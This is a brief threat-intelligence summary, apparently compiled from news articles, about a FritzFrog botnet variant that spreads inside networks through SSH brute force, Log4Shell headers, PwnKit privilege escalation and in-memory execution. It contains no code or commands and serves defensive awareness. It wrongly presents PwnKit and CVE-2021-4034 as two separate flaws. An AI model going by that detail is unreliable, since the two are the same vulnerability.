A new variant of the FritzFrog botnet has recently emerged [3], incorporating the Log4Shell exploit into its tactics [2]. This variant focuses on spreading within compromised networks and targets vulnerable servers through SSH brute force.

Description

The Log4Shell exploit targets the Log4j Java logging library vulnerability [2], enabling remote code execution on vulnerable servers [2]. Unlike previous versions [4], this variant specifically spreads within compromised networks rather than publicly-accessible assets. It gains access to exposed servers through SSH brute force and then scans the internal network for HTTP servers commonly used by Java applications [2]. By sending specially crafted HTTP requests with Log4Shell payloads embedded in multiple headers [2], the botnet aims to trigger the vulnerability and download and execute its binary on the target system [2]. It also attempts to exploit the PwnKit flaw in the PolKit Linux component to gain root privileges [1]. Additionally, the botnet has added a Local Privilege Escalation exploit targeting CVE-2021-4034 in the pkexec component of Linux [2], allowing it to gain root privileges on vulnerable systems [2]. It is adept at avoiding detection by utilizing Linux features to execute payloads directly in memory [2]. The botnet has also improved its ability to identify SSH targets by reading system files on compromised hosts [2], aiding in its lateral spread after breaching the perimeter [2]. Despite organizations patching Log4Shell on internet-facing applications [1], many internal assets remain vulnerable to these attacks. This variant showcases the ongoing evolution and adaptability of the botnet [4].

Conclusion

This new variant of the FritzFrog botnet [3] [4], incorporating the Log4Shell exploit [2], poses a significant threat to compromised networks. It exploits vulnerabilities in the Log4j Java logging library, as well as the PwnKit flaw in the PolKit Linux component and the CVE-2021-4034 vulnerability in the pkexec component of Linux. The botnet’s ability to execute payloads directly in memory and its improved SSH target identification make it difficult to detect and mitigate. Despite organizations patching Log4Shell on internet-facing applications [1], internal assets remain vulnerable. This highlights the need for comprehensive security measures and ongoing vigilance to protect against evolving botnet tactics.

References

[1] https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/
[2] https://www.cyberkendra.com/2024/02/fritzfrog-botnet-expands-attack-arsenal.html
[3] https://www.darkreading.com/threat-intelligence/fritzfrog-botnet-exploits-log4shell-overlooked-internal-hosts
[4] https://thehackernews.com/2024/02/fritzfrog-returns-with-log4shell-and.html